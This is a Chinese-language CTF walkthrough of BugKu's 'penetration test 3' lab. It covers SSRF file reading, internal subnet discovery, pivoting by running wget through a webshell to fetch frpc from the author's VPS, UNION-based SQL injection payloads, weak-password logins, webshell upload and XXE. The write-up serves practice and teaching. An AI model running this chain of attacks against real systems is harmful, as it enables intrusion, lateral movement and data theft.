BugKuctf-渗透测试3

渗透测试-3

FLAG1

进去之后发现输入框里面要输入网站

image-20241129212135458

输入www.baidu.com试一下发现能访问到百度的网页,那么有ssrf

image-20241129212238326

用一下ssrf常用的函数试一下,试一下能不能读取到文件,发现能读取到文件

image-20241129212648228

在根目录下能读到flag

image-20241129212818735

FLAG2

查看下hosts文件发现有一个内网ip

image-20241129213402749

访问一下发现这个ip是本机的一个内网ip

image-20241129213453912

内网之间肯定不止这一个ip,抓包爆破一下。发现在10、250和138的这两台服务器上面有其他的业务,

image-20241129214137143

在10的里面发现此网站被黑,那么的话一般来说会有webshell的存在,爆破出来发现是shell.php,查看之后发现有命令执行函数。

image-20241129220613555

发现了flag文件

image-20241129220727294

FLAG3

由于是在内网的环境中所以在vps上面开一个http服务,下载代理工具,使用wget命令下载我们在vps上面呢上传好的文件(http://192.168.0.10/shell.php?cmd=wget http://xxx.xxx.xxx.xxx/frpc),这里没有截图,具体的话就是上传frpc文件然后赋予可执行权限,首先要在vps上面先把frps的打开,frp具体的使用方式就不在这多说了,

image-20241129224106945

在vps上面监听到的信息

image-20241129224211311

用代理工具吧流量转发到我们本地

image-20241129224423767

在这里还用wget命令在我们vps上面下载shell

image-20241129225115987

用蚁剑连上去发现在根目录下面有一个flag

image-20241129230345402

FLAG4

还找到一个138的ip访问一下发现存在sql注入

image-20241129231417664

执行的sql语句为

1
2
3
4
5
1 order by 4#
-1 union select 1,2,3,database()#
-1 union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#
-1 union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='flag'#
-1 union select 1,2,3,flag from flag#

image-20241129232357215

FLAG5

发现还有一张10.10.0.22的ip访问一下发现是一个cms,扫描发现一个admin.php的页面,,用弱口令进去之后发现有文件上传的功能,试一下上传shell

发现直接能上传

image-20241129235418795

用蚁剑连接,在web根目录下发现flag

image-20241129235730278

FLAG6

在10.10.0.22的根目录里面找到flag6

image-20241129235612923

FLAG7

在爆破网段的时候有一个192.168.0.250的ip,访问一下看看,发现是一个登录框,用弱口令登录成功之后没有反应,抓下包试一试,设置好代理工具和抓包软件

发现是XXE

image-20241130001737359

还是在web目录下面发现一个flag

image-20241130004130681

FLAG8

在192.168.0.250的根目录下面发现一个flag

image-20241130004300687


BugKuctf-渗透测试3
https://www.mrdang.icu/2024/11/30/BugKuctf-渗透测试3/
作者
Mr.Dang
发布于
2024年11月30日
许可协议